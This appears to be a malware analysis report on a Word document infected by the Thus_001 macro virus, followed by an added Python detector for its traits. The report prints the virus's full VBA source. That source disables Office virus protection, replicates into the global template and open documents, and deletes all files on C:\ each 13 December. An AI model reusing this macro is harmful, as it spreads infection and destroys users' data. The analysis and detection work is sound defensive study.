Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cc56d434bff5dfb4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 124.5 KB
Created: 2008-06-18 02:41:00
Authoring application: Microsoft Word 11.5.0
First seen: 2014-06-03
MD5: 06290ba28d8c4a588b3ad61690d6b095
SHA-1: bafa00bd8109a0e2fcbc1ed9b10cca5d38a2dd54
SHA-256: cc56d434bff5dfb4e35076b67da363d002d224e466173c3849ff70f13cbf9dca
Risk score: 210

Heuristics (5)

  • ClamAV: Doc.Trojan.Thus-8 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Thus-8
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template (NormalTemplate) and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched lines in script:
        On Error Resume Next
        Application.Options.VirusProtection = False
        If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro (auto-executes when the document is opened)
    Matched lines in script:
        Attribute VB_Customizable = True
        Private Sub Document_Open()
        'Thus_001'
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 44 URLs below carry the same label, "In document text (OLE body)": they are hyperlinks in the document's own text, none is referenced by the macro, and they are consistent with a benign host document (elementary-school teaching resources) that was infected by the macro virus rather than with attacker infrastructure.
    • http://www.brainpopjr.com/science/plants/plantlifecycle/zoom.weml
    • http://its.guilford.k12.nc.us/webquests/plants/plants1.htm
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week1/v1/index.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week1/s1/game1_type1/index.html
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/the-tiny-seed/plant-parts
    • http://treasures.macmillanmh.com/national/teachers/resources/grade2/research-and-inquiry-resources/resource/plant-parts
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/the-tiny-seed/plant-parts/rubric
    • http://treasures.macmillanmh.com/national/teachers/great-books-to-share/grade-2-reading-list
    • http://treasures.macmillanmh.com/national/teachers/creating-a-home-school-partnership/grade-2-letters-%C2%BB
    • http://www.brainpopjr.com/health/beresponsible/caringforpets/zoom.weml
    • http://classroom.jc-schools.net/basic/sciplants.html
    • http://www.harcourtschool.com/activity/animalneeds/
    • http://staff.harrisonburg.k12.va.us/~kbrantley/Plant_Webquest.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week2/s1/index.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week2/v1/index.html
    • http://www.khake.com/page64.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week3/s1/index.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week3/v1/game1_type4/index.html
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/time-for-kids-a-trip-to-the-emergency-room/hospitals
    • http://treasures.macmillanmh.com/national/teachers/resources/grade2/research-and-inquiry-resources/resource/hospitals
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/time-for-kids-a-trip-to-the-emergency-room/hospitals/rubric
    • http://www.kidskonnect.com/content/view/87/27/
    • http://www.wms.wantaghufsd.k12.ny.us/Forest_Lake_Elem/secondgrade/scilifecycles.htm
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week4/s1/index.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week4/v1/index.html
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/farfallina-and-marcel/how-animals-grow
    • http://treasures.macmillanmh.com/national/teachers/resources/grade2/research-and-inquiry-resources/resource/how-animals-grow
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/farfallina-and-marcel/how-animals-grow/rubric
    • http://www.brainpopjr.com/health/food/foodpyramid/zoom.weml
    • http://www.brainpopjr.com/health/beactive/exercise/zoom/weml
    • http://www.nutritionexplorations.org/kids/activities-main.asp
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week5/s1/index.html
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week5/v1/game1_type1/index.html
    • http://teachers.sheboygan.k12.wi.us/zking/webquest.html
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=26418961-2EA8-4FE9-B7E9-4EA2C330DB08
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=D4A36B96-6F0C-48A8-A635-C1DC04A46222
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=F6E6ECD0-A045-46D8-886A-FD3B51614810
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=41DE3285-F99A-4898-985A-6C4B55DF854F
    • http://player.discoveryeducation.com/index.cfm?guidAssetId=069DFDAC-28EB-46DD-AD31-E9EE51233A0E&blnFromSearch=1&productcode=US
    • http://teacher.scholastic.com/commclub/
    • http://www.hud.gov/kids/whatsjob.html
    • http://www.woodlands-junior.kent.sch.uk/revision/Science/living.htm
    • http://www.food.gov.uk/multimedia/flash/a_healthy_lunchbox_intro.swf
    • http://www.nfpa.org/RiskWatch/kids.html

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2369 bytes
SHA-256: aa92088ec826fb2718584539035df609af62307bde39883f630f395c8c1015d9
Detection: ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = "*.*"
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub
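The OLE_VBA_MACRO_VIRUS_REPLICATION heuristic fires on two things visible in the listing above: writes into a VBA project through the VBE object model, and the Options.VirusProtection = False tampering. The following is an added example, not part of this report or of any analysis engine, that reimplements that check in Python over an abridged copy of the macro source above plus a constructed benign control. The rule ids, severities and verdict thresholds are this example's own choices. It joins VBA " _" continuation lines before matching, because in this sample the target object path (NormalTemplate.VBProject...CodeModule) and the write method (.DeleteLines / .InsertLines) sit on different physical lines; that is also why the engine's per-line "Matched lines" output above shows only the If test and not the write itself.

```python
import re

# Abridged copy of the macro source extracted from this sample (the Thus_001
# Document_Open handler in the listing above); embedded so the scan runs offline.
SAMPLE_VBA = """Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
        With Application.FileSearch
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
"""

# Constructed benign control: an auto-exec handler that never touches a VBA project.
BENIGN_VBA = """Private Sub Document_Open()
    ActiveDocument.Fields.Update
End Sub
"""

# VBE CodeModule methods that write macro source into a project.
WRITE = r"\.\s*(?:InsertLines|DeleteLines|AddFromString|ReplaceLine)\b"

# (rule id, severity, patterns); every pattern must match the same logical line.
# Rule ids, severities and the verdict thresholds are this example's own choices.
RULES = [(rid, sev, [re.compile(p, re.I) for p in pats]) for rid, sev, pats in [
    ("AUTOEXEC_HANDLER", "low", [r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:Document_Open|"
                                 r"Document_Close|Document_New|AutoOpen|AutoClose|AutoNew|AutoExec)\b"]),
    ("AV_TAMPER", "critical", [r"\bOptions\s*\.\s*VirusProtection\s*=\s*False\b"]),
    ("VBE_PROJECT_WRITE", "critical", [r"\bVBProject\b", WRITE]),
    # a write whose target object path is the global template (method before the first argument comma)
    ("NORMAL_TEMPLATE_WRITE", "critical", [r"\bNormalTemplate\s*\.\s*VBProject\b[^,]*" + WRITE]),
    ("ORGANIZER_COPY", "critical", [r"\bOrganizerCopy\b"]),
    ("DESTRUCTIVE_KILL", "high", [r"^\s*Kill\b"]),
    ("DATE_TRIGGER", "medium", [r"\b(?:Day|Month|Weekday)\s*\(\s*Now\b"]),
]]

def logical_lines(src):
    """Join VBA ' _' continuation lines into (first_physical_line_no, statement) pairs."""
    units, buf, start = [], [], None
    for n, raw in enumerate(src.splitlines(), 1):
        line = raw.rstrip()
        cont = line.endswith(" _")
        piece = line[:-2] if cont else line
        if not buf:
            start = n
            buf.append(piece.rstrip())       # keep the first line's indent
        else:
            buf.append(piece.strip())
        if cont:
            continue
        units.append((start, " ".join(buf)))
        buf = []
    if buf:                                   # continuation marker on the last line
        units.append((start, " ".join(buf)))
    return units

def scan_vba(src, join_continuations=True):
    """Return {rule_id: (severity, [(line_no, statement), ...])} for every rule that fired."""
    units = logical_lines(src) if join_continuations else list(enumerate(src.splitlines(), 1))
    hits = {}
    for line_no, text in units:
        body = text.strip()
        if body.startswith("'") or body.lower().startswith("rem "):
            continue                          # whole-line comment; trailing comments are not stripped
        for rid, sev, pats in RULES:
            if all(p.search(text) for p in pats):
                hits.setdefault(rid, (sev, []))[1].append((line_no, body))
    return hits

def verdict(hits):
    sevs = {sev for sev, _ in hits.values()}
    if "critical" in sevs:
        return "MALICIOUS"
    return "SUSPICIOUS" if "high" in sevs else "NO_MACRO_VIRUS_INDICATORS"

if __name__ == "__main__":
    for label, src in (("Thus_001 excerpt", SAMPLE_VBA), ("benign control", BENIGN_VBA)):
        hits = scan_vba(src)
        print(f"{label}: {verdict(hits)}")
        for rid, (sev, where) in hits.items():
            print(f"  {rid} [{sev}] at line(s) {[n for n, _ in where]}")
```

Running scan_vba with join_continuations=False shows the caveat: VBE_PROJECT_WRITE still fires, because the .DeleteLines / .InsertLines argument lists happen to mention another VBProject on the same physical line, but NORMAL_TEMPLATE_WRITE cannot fire at all, since the global-template object path and the write method are never on one physical line. A per-line scanner therefore sees "some project is written" but loses "the global template is the target", which is the fact that distinguishes an infector from a macro that merely edits its own document. Whole-line comments are skipped so a commented-out line does not trigger a rule; trailing comments are not stripped, since that needs string-literal-aware parsing.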